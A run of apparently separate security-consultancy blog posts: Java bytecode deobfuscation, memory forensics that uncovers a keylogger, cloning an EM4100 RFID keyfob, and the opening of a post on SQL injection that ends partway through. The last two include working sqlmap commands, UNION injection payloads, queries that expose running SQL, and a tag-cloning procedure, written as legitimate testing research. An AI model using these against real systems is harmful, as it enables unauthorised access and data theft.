To perform this task, we chose the second option. As it turns out, the JVM instruction set is quite simple to parse and is well documented [4, 5, and 6], so the process of writing the disassembler was not difficult.

Parsing the class file - overview

First we parse the class file format, extracting the constants pool, fields, interfaces, classes and methods. We then disassemble the method bodies (mapping instructions to a set of opcodes); the resulting disassembly looks like the below (snippet):


Figure 6 - Showing the byte to opcode translation; each section is divided into a grouping (e.g. Constants, Loads, Maths, Stack), an operation (e.g. bipush) and an optional argument (instruction dependent, such as ‘77’).

As you can see, the above shows the tagged data that resulted from parsing the JVM bytecode into a list of opcodes with their associated data.
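As a flavour of how approachable the format is, here is a minimal Python sketch that reads the fixed class-file header (magic, version, constant pool count) as laid out in the JVM specification [5]; it is an illustration, not a piece of our actual (F#) tooling:

```python
import struct

def read_class_header(blob: bytes) -> dict:
    """Parse the fixed-size prefix of a .class file: u4 magic, u2 minor
    version, u2 major version, u2 constant_pool_count (JVM spec, 4.1)."""
    magic, minor, major, cp_count = struct.unpack_from(">IHHH", blob, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    # The constant pool is indexed from 1, so it holds cp_count - 1 entries.
    return {"minor": minor, "major": major, "constant_pool_entries": cp_count - 1}
```

The constant pool entries that follow this header are tag-prefixed and variable-length, which is where the real parsing work begins.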

Extracting encryption function

We are after the switch section of the disassembled code, as this contains the XOR key that we will use to decrypt the ciphertext. We can see based on the documentation that it maps back to the instruction tableswitch [7], which is implemented as a jump table, as one would expect.

Now it is a matter of mapping over the opcodes to locate the tableswitch instruction. Below is the section of the opcode list we are interested in:


As you can see, the tableswitch instruction contains arguments: the first argument is the default case (67), and the second argument is the jump table, which maps a 'case' to a jump. In this example, case 0 maps to the jump 48. The last argument (not in screenshot) is the padding which we discard.

Our algorithm for extracting this table is as follows:

  1. Detect if a control section contains a tableswitch.
  2. Extract the tableswitch.
  3. Extract the jumps from the tableswitch.
  4. Build a new jump table containing the original jump table with the default jump case appended on the end.
  5. We now have all the jumps to the keys.
  6. Map over the method body and resolve the jumps to values.
  7. We now have all the key values and the XOR function name.
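Steps 1 to 4 reduce to decoding the instruction's operands: after the tableswitch opcode (0xAA) and zero to three alignment padding bytes come a 32-bit default offset, the low and high case bounds, and then high - low + 1 jump offsets [7]. Our implementation is in F# (Figure 7 below); this Python sketch of the same extraction is illustrative only:

```python
import struct

def extract_jump_table(code: bytes, pc: int) -> list:
    """Decode a tableswitch at offset pc in a method body and return its
    jump table with the default case appended (steps 2-4 above)."""
    if code[pc] != 0xAA:
        raise ValueError("not a tableswitch instruction")
    # Operands start at the next 4-byte boundary after the opcode byte.
    pos = (pc + 4) & ~3
    default, low, high = struct.unpack_from(">iii", code, pos)
    jumps = list(struct.unpack_from(">%di" % (high - low + 1), code, pos + 12))
    return jumps + [default]
```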

 
Figure 7 – Code(F#) Showing the pattern matching function which implements the algorithm to extract switch tables.

 
Figure 8 - Showing the resulting extracted XOR keys from the switch table

The next step is to locate the section of the class where the strings are held. In the case of this obfuscator, we have determined through multiple decompilations that the encrypted strings are stored within the static initialization section [8], which JAD generally does not handle effectively. At runtime, when the class is initialised, the strings are decrypted and the resulting plaintext is assigned to the respective variable.

Extracting the static initialization section is trivial: we map over the code body and find sections where the name is '<clinit>' [9] and the descriptor is '()V', which denotes a method with no parameters that returns void [10].

Once we have extracted this, we resolve the 'private static' values making sure to only select the values where our decryption function is being called (we know the name of the function as we saved it). It is now just a process of resolving the strings within the constants pool.

At this stage we have:

  1. Extracted the decryption key;
  2. The actual decryption algorithm implemented (XOR); and
  3. Encrypted strings.

We can now decrypt the strings and replace the respective constant pool entry with the plaintext. Since the decryption uses a basic bitwise XOR, the plaintext length is equal to the ciphertext length, which means we don't have to worry about truncation or accidentally overwriting non-relevant parts of the constant pool. Later we plan to update the variable names throughout the classes and remove the decryption functions.
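The in-place swap can be sketched as follows; the offset of the CONSTANT_Utf8_info entry is assumed to have been resolved already during the constant pool walk, and modified UTF-8 subtleties are ignored (safe for ASCII plaintext):

```python
def patch_utf8_entry(blob: bytearray, offset: int, plaintext: bytes) -> None:
    """Overwrite the bytes of a CONSTANT_Utf8_info entry in place:
    u1 tag (1), u2 length, then 'length' bytes of string data."""
    if blob[offset] != 1:
        raise ValueError("not a CONSTANT_Utf8_info entry")
    length = int.from_bytes(blob[offset + 1:offset + 3], "big")
    if length != len(plaintext):
        raise ValueError("XOR preserves length, so these should always match")
    blob[offset + 3:offset + 3 + length] = plaintext
```

Because the stored length field never changes, nothing after the entry moves, so no other constant pool indices need fixing up.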


Figure 9 - Example decryption, plaintext bytes, cipher bytes, and plaintext result.

The particular class file we chose to look at turned out not to have any interesting strings, but we are now able to see exactly what it does. The next stage is to loop over all class files and decrypt all the strings, then analyse the results so that we can hopefully find vulnerabilities, which is a story for another day.

Conclusion

In conclusion, we have shown that by investing time in reversing we can have higher confidence in the functionality of the target application, and by automating the recovery of obfuscated code we have shown that obfuscation alone is not an adequate protection mechanism, although it does slow an attacker down.

In addition to the automated recovery, we now have a skeleton Java decompiler, which will eventually be lifted into our static analysis tool.

Finally, we have shown that if you try hard enough, everything becomes a fun programming challenge.

 

[0] http://www.excelsior-usa.com/articles/java-obfuscators.html

[1] http://jd.benow.ca/

[2] http://varaneckas.com/jad

[3] http://en.wikipedia.org/wiki/Function_overloading

[4] https://github.com/Storyyeller/Krakatau

[5] https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-4.html

[6] http://docs.oracle.com/javase/specs/jvms/se8/html/jvms-6.html

[7] http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-6.html#jvms-6.5.tableswitch

[8] http://docs.oracle.com/javase/tutorial/java/javaOO/initial.html

[9] http://stackoverflow.com/questions/8517121/java-vmspec-what-is-difference-between-init-and-clinit

[10] http://stackoverflow.com/questions/14721852/difference-between-byte-code-initv-vs-initzv

Thanks for the Memories: Identifying Malware from a Memory Capture


We've all seen attackers try and disguise their running malware as something legitimate. They might use a file name of a legitimate Windows file or even inject code into a legitimate process that's already running. Regardless of how it's done, that code has to run, which means it has to be in memory. Somewhere.

In this blog post we lay out a real-life examination of computer memory which enabled us to identify a keylogger that was running, what files were responsible for running it, and how it managed to ensure it was started every time the machine booted up. Not only did this provide us with previously unknown indicators of compromise, but also specific details with which we could assist the client in their remediation efforts.

Background

During some hard disk forensics, one of our examiners found a text file which was clearly a log of a keylogger application. I won't share the gory details of what it contained - I'm sure you can imagine. By performing a search for the file name, the examiner found a hit in C:\Windows\MEMORY.DMP. This file stores debug information when a system failure occurs. The examiner passed this one over to me to see if I could do anything to help identify the keylogger.

I've anonymised the username for the purposes of this blog, replacing the username of the currently logged in user with 'theuser', but the file we're interested in is:

C:\Users\theuser\AppData\Local\Temp\theuser_tmp.dat

As is probably obvious, the file name is made up of logged-in-user-name + _tmp.dat.

In this case, as is the default, Windows had created a 'Kernel Memory Dump'. That is, not a full memory dump, but enough to help troubleshoot system failures. Unfortunately, at least to the best of my knowledge, there's not too much that can be done with a Kernel Memory Dump. However, that didn't deter us. The hard disk also contained a hiberfil.sys, which is the file that Windows uses when it goes into hibernation; it essentially contains a copy of RAM at the time the machine enters the hibernation state.

Enter Volatility

There are a few memory forensics tools out there, but the one I've seen prove itself time and time again is Volatility from the Volatility Foundation. Volatility is written in python, is free and is open source.

Armed with the latest version of Volatility (2.4, at the time of writing), I set about examining the hiberfil.sys. The first hurdle was compression - hiberfil.sys files are compressed, so Volatility has to decompress the file on the fly in order to analyse it. This is slow. Luckily, Volatility provides the imagecopy plugin which allows us to convert one type of memory dump (e.g. hiberfil) into a raw, uncompressed format - much faster.

C:\>python vol.py -f hiberfil.sys --profile=Win7SP1x64 imagecopy -O hiberfil.dd

Is the file into which the keystrokes are being logged actually referenced in memory?

With an uncompressed image, and contemporaneous notes underway, a good starting point was to see if the file was open in memory. For that, we use filescan:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 filescan

And in the output, we look for our file:

Offset(P)  Pointers Handles Access Name
---------- -------- ------- ------ ----
--SNIP--
0x1b66ef20 16       0       -W--w- \Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
--SNIP--

This is good news. The file was indeed open, for write access, when the memory dump was taken. At least we know we're not wasting our time.

Which processes are accessing the file?

The next step was to see which processes were accessing the file. A useful blog post from Andreas Schuster says that Volatility should be able to resolve the process(es) by following the _FILE_OBJECT structure. However, the blog post relates to quite an old version of Volatility and it doesn't seem to apply to the current version. Or it might be that it only works with handles, which in this case we didn't have. Regardless, there's always something else to try.

By using strings from Sysinternals we can find the positions (offsets) within the raw memory dump where the paths can be seen, and save them to a file:

C:\>strings -o -n 9 hiberfil.dd | findstr /I /L "\theuser_tmp.dat" >strings.txt

And the output, in strings.txt, looks something like this:

--SNIP--
785366187:\Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
795296032:\Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
821237504:C:\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
829851904:C:\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
--SNIP--

We can then use this strings file as an input to Volatility's strings plugin. The strings plugin takes a text file where each line contains a decimal offset and string to find, for example: 123456:some_text, and returns the process ID and virtual address where the string is found.
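An offsets file in that format can also be produced without Sysinternals strings. A simplified Python sketch (it records the needle itself rather than the full surrounding string, and reads in chunks with an overlap so hits spanning a chunk boundary are not missed):

```python
import io

def offsets_lines(stream, needle: bytes, chunk_size=1 << 20):
    """Scan a raw image for needle, returning 'decimal_offset:string'
    lines in the input format the Volatility strings plugin expects."""
    lines = []
    base = 0   # file offset of the start of the current chunk
    tail = b"" # overlap carried from the previous chunk
    while True:
        data = stream.read(chunk_size)
        if not data:
            break
        window = tail + data
        start = 0
        while True:
            hit = window.find(needle, start)
            if hit == -1:
                break
            lines.append("%d:%s" % (base - len(tail) + hit, needle.decode()))
            start = hit + 1
        # Keep the last len(needle)-1 bytes so boundary hits are found once.
        tail = window[-(len(needle) - 1):] if len(needle) > 1 else b""
        base += len(data)
    return lines
```

Usage would be along the lines of `offsets_lines(open("hiberfil.dd", "rb"), b"theuser_tmp.dat")`, with the result written out to strings.txt.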

So:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 strings -s strings.txt >strings-output.txt

Gives us the following in strings-output.txt:

--SNIP--
1125860523 [2000:008d74ab] \Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
1160780915 [4628:1051ec73] c:\users\theuser\appdata\local\temp\theuser_tmp.dat
1167748112 [kernel:fa8001c4ec10] heuser\AppData\Local\Temp\theuser_tmp.dat:6E53BFF5-0001-412B-8407-E3AEDE763511:$DATA
1336598656 [kernel:f8a007b1b080] \Users\theuser\AppData\Local\Temp\theuser_tmp.dat
1542979888 [4628:0322d130] C:\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
1575054952 [3056:025c3e68] \Device\HarddiskVolume1\Users\theuser\AppData\Local\Temp\theuser_tmp.dat
--SNIP--

By working through the file, a unique list of processes accessing the strings can be drawn up:

  • kernel
  • 2000
  • 3056
  • 4628
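With a large output file, drawing up that list by hand gets tedious; a short Python sketch matching the [pid:address] tags shown in the strings plugin output above:

```python
import re

# Matches tags like [2000:008d74ab] or [kernel:fa8001c4ec10].
TAG = re.compile(r"\[(kernel|\d+):[0-9a-fA-F]+\]")

def processes_referencing(lines):
    """Return the sorted unique set of PIDs (or 'kernel') tagged in
    Volatility strings plugin output lines."""
    found = set()
    for line in lines:
        match = TAG.search(line)
        if match:
            found.add(match.group(1))
    return sorted(found)
```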

The process IDs can be easily found by running the pslist plugin and checking the PID value:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 pslist

The output gives us:

Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------
0xfffffa8001719b30 System                    4      0    146     2056 ------      0 2014-09-15 07:35:03 UTC+0000
0xfffffa800305d040 smss.exe                320      4      2       33 ------      0 2014-09-15 07:35:03 UTC+0000
0xfffffa8004eeeb30 csrss.exe               456    448     10     1052      0      0 2014-09-15 07:35:10 UTC+0000
--SNIP--
0xfffffa800639cb30 Rtvscan.exe            3056    612     24      531      0      1 2014-09-15 07:35:34 UTC+0000
--SNIP--
0xfffffa8002d63490 ccSvcHst.exe           2000    612     36      408      0      1 2014-09-15 07:35:28 UTC+0000
--SNIP--
0xfffffa80032a0b30 svchost.exe            2816    612     4       102      0      0 2014-09-15 07:35:33 UTC+0000
--SNIP--
0xfffffa8003a766f0 explorer.exe           4628   4460     46     1118      1      0 2014-09-15 07:36:12 UTC+0000
--SNIP--

So, kernel, ccSvcHst, Rtvscan and explorer all have references to the file path in their process memory space.

ccSvcHst and Rtvscan are both components of the Symantec endpoint protection software installed on the system. It's reasonable that the AV would be listing the file for a variety of reasons, but explorer is slightly odd. Explorer is spawned when one uses an open or save file dialog, but that seems unlikely for a malicious file. The explorer process definitely warrants a closer look.

A closer look at explorer.exe

Checking the md5 of explorer.exe we can be happy that explorer itself hasn't been tampered with. Perhaps a DLL is being injected. Of course, Volatility provides a plugin with which we can check what DLLs a process has loaded; the appropriately named dlllist.

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dlllist --pid=4628
************************************************************************
explorer.exe pid:   4628
Command line : C:\Windows\Explorer.EXE
Service Pack 1

Base                             Size          LoadCount Path
------------------ ------------------ ------------------ ----
0x00000000ffe90000           0x2c0000             0xffff C:\Windows\Explorer.EXE
0x00000000777b0000           0x1a9000             0xffff C:\Windows\SYSTEM32\ntdll.dll
0x0000000077690000           0x11f000             0xffff C:\Windows\system32\kernel32.dll
0x000007fefd900000            0x6b000             0xffff C:\Windows\system32\KERNELBASE.dll
--SNIP--
0x000007fef5930000            0x15000                0x1 C:\Windows\Installer\WinInstall.dll
--SNIP--

There were actually 215 DLLs loaded by explorer. (In case you're thinking 215 sounds suspiciously high, it's not. If you've got 'Process Explorer' to hand, check your own explorer.exe - I bet you've got around 200 loaded.)

So, scrolling down the list preparing myself to have to check the md5 of each, I noticed the one between the snips above: C:\Windows\Installer\WinInstall.dll. This folder is immediately suspicious: there aren't normally DLLs in the root of the Installer folder.

The easy option here would be to fire up the hard disk image and take a look at the file, but:

  1. we're showing off memory skills here, and
  2. I don't have the hard disk drive image.

But that's fine, because Volatility also includes a dlldump plugin. No prizes for guessing that it dumps DLLs.

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dlldump --pid=4628 --dump-dir=4628
Process(V)         Name                 Module Base        Module Name          Result
------------------ -------------------- ------------------ -------------------- ------
0xfffffa8003a766f0 explorer.exe         0x00000000ffe90000 Explorer.EXE         OK: module.4628.74a766f0.ffe90000.dll
0xfffffa8003a766f0 explorer.exe         0x00000000777b0000 ntdll.dll            OK: module.4628.74a766f0.777b0000.dll
0xfffffa8003a766f0 explorer.exe         0x0000000002130000 apphelp.dll          OK: module.4628.74a766f0.2130000.dll
0xfffffa8003a766f0 explorer.exe         0x0000000180000000 igfxpph.dll          OK: module.4628.74a766f0.180000000.dll
--SNIP--
0xfffffa8003a766f0 explorer.exe         0x000007fef5930000 WinInstall.dll       OK: module.4628.74a766f0.7fef5930000.dll
--SNIP--

This article isn't the place to get into the analysis of the DLL, but if we do strings against the file we get some pretty damning clues...

--SNIP--
[Right SHIFT]
[Left SHIFT]
[SCROLL LOCK]
[NUM LOCK]
[F12]
[F11]
[F10]
--SNIP--
Global\Klogger
--SNIP--
[%02d/%02d/%d %02d:%02d:%02d] (%s)
RegisterRawInputDevices
User32.dll
GetRawInputData
user32.dll
%s\%s_tmp.dat
KLogger
--SNIP--
E:\Code\Keylog\KloggerDll\x64\Release\KloggerDll.pdb
--SNIP--

It's easy enough to see:

  • Keylogger key mappings, e.g. the right shift key becomes [Right SHIFT]
  • A timestamp and message format string: [%02d/%02d/%d %02d:%02d:%02d] (%s)
  • The name of two Windows API functions to do with getting raw input.
  • A format string for our file name: %s\%s_tmp.dat
  • And generally, terms to do with 'logger'.

How is the DLL injected into explorer?

All that's left for us to do now is to see how the DLL is being injected into the explorer process.

I fully expected this to be a key/value pair in the Registry, so, since we're staying in memory, let's use Volatility's dumpregistry plugin to, well, dump the Registry files from memory to disk:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dumpregistry --dump-dir=reg

We end up with a file listing like this:

 Volume in drive C has no label.
 Volume Serial Number is 1234-5678

 Directory of C:\reg

14/01/2015  09:21    <DIR>          .
14/01/2015  09:21    <DIR>          ..
23/12/2014  12:10             8,192 registry.0xfffff8a00000f010.no_name.reg
23/12/2014  13:57        22,675,456 registry.0xfffff8a000023290.SYSTEM.reg
23/12/2014  12:10           282,624 registry.0xfffff8a00006b410.HARDWARE.reg
23/12/2014  12:10        66,224,128 registry.0xfffff8a001bf7410.SOFTWARE.reg
23/12/2014  12:10            40,960 registry.0xfffff8a004071010.SECURITY.reg
23/12/2014  12:10            36,864 registry.0xfffff8a0040dc410.SAM.reg
23/12/2014  12:10           245,760 registry.0xfffff8a004153410.NTUSERDAT.reg
23/12/2014  12:10           249,856 registry.0xfffff8a00431d410.NTUSERDAT.reg
23/12/2014  12:10         4,128,768 registry.0xfffff8a004ef8010.ntuserdat.reg
23/12/2014  12:10         6,733,824 registry.0xfffff8a005405010.UsrClassdat.reg
23/12/2014  12:10         5,808,128 registry.0xfffff8a00712f010.Syscachehve.reg
23/12/2014  12:10           286,720 registry.0xfffff8a007c9f010.DEFAULT.reg
              12 File(s)    106,721,280 bytes
               2 Dir(s)  69,660,389,376 bytes free

Next step, let's see if we can quickly identify which of these files contains a reference to WinInstall.dll:

C:\>strings.exe reg\*.reg | findstr /I /L WinInstall.dll
FINDSTR: Line 662056 is too long.

So one line is too long, that's normal, but there are no results. That is unexpected.

What about the folder in which the file resides:

C:\>strings.exe reg\*.reg | findstr /R C:\\Windows\\Installer\\.*dll
C:\reg\registry.0xfffff8a000023290.SYSTEM.reg: C:\Windows\Installer\adspack.dll
C:\reg\registry.0xfffff8a000023290.SYSTEM.reg: C:\Windows\Installer\adspack.dll
FINDSTR: Line 662056 is too long.

So now we have a SECOND DLL in the C:\Windows\Installer folder?! That's suspicious. Is THAT dll loaded by any processes?

Let's see if 'adspack.dll' appears anywhere.

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dlllist >dlllist_all.txt
--SNIP--
************************************************************************
svchost.exe pid:   2816
Command line : C:\Windows\system32\svchost.exe -k netsvcs
Service Pack 1

Base                             Size          LoadCount Path
------------------ ------------------ ------------------ ----
0x00000000ffdb0000             0xb000             0xffff C:\Windows\system32\svchost.exe
0x00000000777b0000           0x1a9000             0xffff C:\Windows\SYSTEM32\ntdll.dll
0x0000000077690000           0x11f000             0xffff C:\Windows\system32\kernel32.dll
--SNIP--
0x000007fef85e0000            0x25000                0x1 c:\windows\installer\adspack.dll
--SNIP--

Our mystery dll is loaded by svchost - a service?

Let's grab a copy of this file:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 dlldump --pid=2816 --dump-dir=2816
Process(V)         Name                 Module Base        Module Name          Result
------------------ -------------------- ------------------ -------------------- ------
0xfffffa80032a0b30 svchost.exe          0x00000000ffdb0000 svchost.exe          OK: module.2816.752a0b30.ffdb0000.dll
0xfffffa80032a0b30 svchost.exe          0x00000000777b0000 ntdll.dll            OK: module.2816.752a0b30.777b0000.dll
--SNIP--
0xfffffa80032a0b30 svchost.exe          0x000007fef85e0000 adspack.dll          OK: module.2816.752a0b30.7fef85e0000.dll
--SNIP--

And take a look at it in MiTeC's EXE Explorer.

A 'ServiceMain' function is exported...

...and there's a resource called 'DLL', which IS WinInstall.dll:

Analysis of this DLL shows that it runs as a service, drops WinInstall.dll and injects it into explorer.

We already know from above that this DLL is referenced in the SYSTEM hive, so it's a quick check (with MiTeC's Windows Registry Recovery) to see precisely where:

So, as we can see, a service called Ias is started at boot using adspack.dll.

Bullet-Point Summary

  • On start-up, a service called 'Ias' is started, the binary for which is C:\Windows\Installer\adspack.dll.
  • This dll drops another dll, C:\Windows\Installer\WinInstall.dll, which is a keylogger.
  • This keylogger is injected into the explorer.exe process.

Contact and Follow-up

Adam is part of our Response team in Context's Cheltenham office. See the Contact page for how to get in touch.

Appendix: Get Lucky! A keylogger has to log key strokes.

As we're hunting a keylogger, we can consider something a keylogger has to do: log keystrokes that can't be represented by a printable character. For example: backspace, enter, home, end, etc. Often, as was the case in this instance, keyloggers represent these unprintable characters as the literal name within square brackets, for example: [ENTER]. We could have looked for that with strings again:

C:\>strings -o -n 11 hiberfil.dd | findstr /I /L "[BACKSPACE]" >backspace.txt

Which gives an output of:

834782000:[BACKSPACE]
1165946328:[BACKSPACE]

OK! So, we have a couple of matches. Back to our strings plugin:

C:\>python vol.py -f hiberfil.dd --profile=Win7SP1x64 strings -s backspace.txt	
834782000 [4628:7fef593b330] [BACKSPACE]
1165946328 [2816:7fef85fcdd8][BACKSPACE]

Nice! So, we have two processes that contain the string:

  1. 2816 svchost.exe
  2. 4628 explorer.exe

So, explorer.exe has hit again, and svchost.exe is of course the process responsible for launching services. This approach would have identified our two processes too, but those unprintable characters could have been encoded in any number of ways - it looks like our attackers were just a little lazy.
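That sweep is also easy to script. Here's a hedged sketch of our own (an illustration, not a Volatility plugin) that hunts raw image bytes for bracketed key names:

```python
import re

# Best-effort pattern for bracketed key names such as [BACKSPACE], [NUM LOCK]
# or [Left SHIFT] - a common (if lazy) keylogger convention.
KEY_TOKEN = re.compile(rb"\[(?:[A-Za-z]+ )?[A-Z ]{3,15}\]")

def find_key_tokens(image):
    """Return (offset, token) pairs for each bracketed key name in the image bytes."""
    return [(m.start(), m.group().decode()) for m in KEY_TOKEN.finditer(image)]
```

The offsets it returns can be fed to Volatility's strings plugin, exactly as above, to map each hit back to its owning process. (For a multi-gigabyte hiberfil you would mmap the file rather than reading it wholesale.)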

RFID Tags in Access Control Systems

One of our recent engagements required us to explore an unknown RFID tag which was used as part of an access control system. The objective of this engagement was to find out how the RFID tag communicates with the reader, and if possible to clone the tag. As we did not have any further information or documentation about the access control system, we had to start from scratch.

Common RFID Frequencies

When it comes to testing an RFID tag, we first need to know which frequency the signal between the tag and the reader is transmitted on. The most common frequencies are:

  • 120-125 kHz (Low Frequency)
  • 13.56 MHz (High Frequency)
  • 433 MHz (Ultrahigh Frequency)

Low frequency tags operate at a range of up to 10cm and are commonly used for animal identification, factory data collection or simple access control systems. High frequency tags operate at ranges between 10cm and 1m and are commonly used in contactless payment systems or public transport tickets (such as the Oyster card). Ultrahigh frequency tags are more likely to be found in warehouse logistics, as they operate over a much wider range of between 1m and 100m.

Additionally, RFID tags can be separated into two groups: active and passive. Active means that a battery is attached to the tag and a signal is transmitted continuously. Passive means that the tag is only active when an RFID reader is near enough for the tag to harvest energy from the reader's radio waves.

Setup

The setup for this engagement consisted of a keyfob and an RFID reader. Examining the two components did not yield any further information, except that a 10 digit hex number was printed on top of the keyfob - likely a unique ID - and that it is probably a passive tag, as we could not see any battery inside.

The next step in gathering further information about the tag was to place it on a high frequency and then a low frequency antenna and read data samples from the stream. For this we used a proxmark3, a device which can be used not only as an RFID reader and writer but also to simulate a data stream. Placing the keyfob on the high frequency antenna did not show any data being transmitted, but placing it on the low frequency antenna did - the keyfob is therefore a low frequency RFID tag. Reading around 20000 data samples from the transmitted stream resulted in the following graph:

proxmark3> data samples 20000

proxmark3> data plot


The graph above shows the samples taken from the data stream, each sample taken at the same fixed interval. The exact wave form is not needed, as only 'ones' (up) and 'zeros' (down) are transmitted.

Analysis

At this point we could already see that the same signal is repeated after some time, and reading more samples from the transmitted data stream proved this. The repetition means it is very likely that no nonce is used to defend against replay attacks, and that we could simply sniff the transmitted stream and then emulate it when near the reader in order to gain access. Commonly, these transmitted streams are encoded, and in order to decode the data stream we first had to demodulate it using Amplitude-Shift Keying (ASK), a form of amplitude modulation that represents digital data as variations in the amplitude of a carrier wave. The plotted graph looked like the following:

One of the most common data encodings used when transmitting data in telecommunications is so-called Manchester Encoding, and this was our first try when it came to decoding the signal. The encoded data can be retrieved by XORing the clock with the Manchester value, as shown in the following image:
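To illustrate that XOR relationship, here is a minimal decoding sketch of our own (the clock convention chosen is an assumption; the proxmark3 tooling normally handles this for you):

```python
# Manchester decoding sketch: each data bit is sent as two half-bit samples,
# and the data bit is the first half XORed with the clock's first half. The
# two halves of a valid symbol always disagree, which doubles as a sync check.
def manchester_decode(halves, clock_first_half=1):
    bits = []
    for i in range(0, len(halves) - 1, 2):
        first, second = halves[i], halves[i + 1]
        if first == second:
            raise ValueError("missing mid-bit transition - lost sync")
        bits.append(first ^ clock_first_half)
    return bits
```

The mid-bit transition check is what makes Manchester coding self-clocking: a pair of identical halves means the decoder has slipped out of phase with the clock.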


After successfully decoding the signal we retrieved the following bit stream which also showed the previously identified recurrence in the plotted graph of the transmission stream:


The final bit stream consisted of 64 bits, and the following assumptions were made to decode it. The keyfob had a 10 digit hex number printed on top of it, which can be represented in binary (e.g. 0000 = 0, 1111 = F, ...). Additionally, it is very likely that the 9 bits at the beginning of the bit stream are some kind of header which tells the reader about the start of the transmission. Summing up these assumptions gives 10 * 4 bits + 9 * 1 bit = 49 bits. For the leftover 15 bits we assumed that they are used as checksums or parity bits - checksums are very common in RFID based systems, as the transmitted traffic might be disrupted by other signals or by a poor transmission signal.

Reading through various manuals and specifications suggested that one possible protocol could be the EM4100 protocol. EM4100 consists of a 64 bit data stream: a 9 bit header (all set to 1), 8 version bits, 32 data bits, 14 parity bits and one stop bit (set to 0). Putting all this information together resulted in the following table, in which each parity bit was calculated with an XOR operation:
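To make the 64-bit budget concrete, here is a hedged sketch of EM4100 frame construction based on that layout (even parity per nibble row and per column is our reading of the specification):

```python
# Hedged reconstruction of an EM4100 frame: a 9-bit header of ones, ten
# 4-bit nibbles (version + data) each followed by an even row-parity bit,
# four even column-parity bits, and a stop bit of 0 - 64 bits in total.
def em4100_frame(hex_id):
    assert len(hex_id) == 10, "version + data is 10 hex digits"
    rows = [[int(b) for b in format(int(c, 16), "04b")] for c in hex_id]
    bits = [1] * 9                                    # header: nine 1s
    for row in rows:
        bits += row + [sum(row) % 2]                  # nibble + row parity
    bits += [sum(row[c] for row in rows) % 2 for c in range(4)]  # column parity
    bits.append(0)                                    # stop bit
    return bits

assert len(em4100_frame("01068B6120")) == 64
```

The assertion confirms the budget: 9 + 10 * (4 + 1) + 4 + 1 = 64 bits.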


Taking all bits from the version and data sections and converting them to hex gave us the ID 01068B6120. Unfortunately, this was not the number printed on top of the keyfob, but we were not discouraged and pressed on - it might simply have been changed for security purposes. The next step, cloning the keyfob's ID to another tag, was quite simple: we just had to take a blank T55x7 RFID tag - these support the EM4100 protocol - and write the ID to it, so that it is repeated whenever the tag is powered on by the electromagnetic field of a reader.

Beeeeeeeeeeep - That was the sound we heard when the door finally opened.

Solution

RFID systems which use a static ID for authentication are pretty common and a cheap solution when it comes to access control systems or tracking the working hours of employees in an office. However, they should not be used to protect security sensitive areas or information. A better approach is to use an RFID card which supports encryption and countermeasures against replay attacks - though even those might be vulnerable to other attacks, such as the Mifare Classic card... but that is another story.

Contact and Follow-Up

Christian is a part of our Assurance team in Context's Essen office, Germany. See the Contact page for how to get in touch.

SQL Inception: How to select yourself

In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an error message, performing an attack involves an amount of guesswork by the attacker. The more complicated the original SQL statement, the more difficult it can become to extract data using faster UNION based techniques.

If the type of injection is blind then this can take time to perform and cause a lot of traffic to be generated, especially when extracting a significant amount of data from the database. This prompted the question - “Wouldn’t this be a lot easier if I could see the SQL being executed?”

Databases Store Queries in Tables

So far I have discovered methods of extracting the original SQL query via a SQL injection attack on Oracle, Microsoft SQL Server, MySQL and Postgres databases. Other methods and techniques may exist with these and other databases however I find these four to be quite common and they have been my focus for this blog post.

For Oracle and MS SQL databases, the query locations that I found require a relatively high privilege account to perform but they also offer the ability to see other queries that have been executed before and by other users. Furthermore, these locations could contain sensitive information such as credentials / hashes and highlight the use of SQL functions and stored procedures which would allow for a much greater understanding of how the application works.

MySQL and Postgres

The SQL queries that I used to extract the current running query for these two databases are as follows:

Postgres(*)         Select current_query from pg_stat_activity

MySQL               Select info from information_schema.processlist

(*) - For Postgres, the column name differs depending on the version used. If 'current_query' doesn't work, try just 'query'.

When extracting information from these tables it is important to consider what is happening. The database itself will be trying to use these tables at the same time as the web application that we are injecting so occasionally it may report as empty. In my use of this so far, most of the time the query has worked fine in the real world.

To test these new techniques, I created a vulnerable web application with a needlessly complicated query and used the above as custom queries in a popular SQL injection tool called SQLMap.

In the following example, the vulnerable application is a single web page with a MySQL backend.

http://localhost/test/vuln.aspx?album=1465

We can confirm that it is injectable by using payloads like:

  • 1466-1
  • 1465 order by 1
  • 1465 order by 2

Furthermore, we know from using ‘order by 3’ that there are only two columns being returned however the following only returns our original row:

  • 1465 union all select null,null

We can still use SQLMap to extract data from the database, as it will find that blind Boolean and time based techniques work; but if we want to extract a lot of data quickly, we will need to find out what else the query is doing. For this we can use SQLMap to execute one of the above queries via the --sql-query switch, which will return the full SQL statement that is being executed.

sqlmap -u "http://localhost/test/vuln.aspx?album=1465"
--sql-query="select info from information_schema.processlist"


Fig .1 - SQLMap output showing the original query on MySQL database

Removing the SQL that SQLMap injects, we can see the following statement being executed by the application, including a SQL comment that was left in for demonstration purposes.

Select title from (
select asin,title
from album
where rank = 1465) as test
where asin like 'B0000%' -- Misc Comment

With the query visible, we can see that it is checking the first column in the outer select for a value like ‘B0000%’ so if we use the following as a payload, we should be able to extract data much faster.
  • 1465 union all select 'B00000',TABLE_NAME from INFORMATION_SCHEMA.TABLES


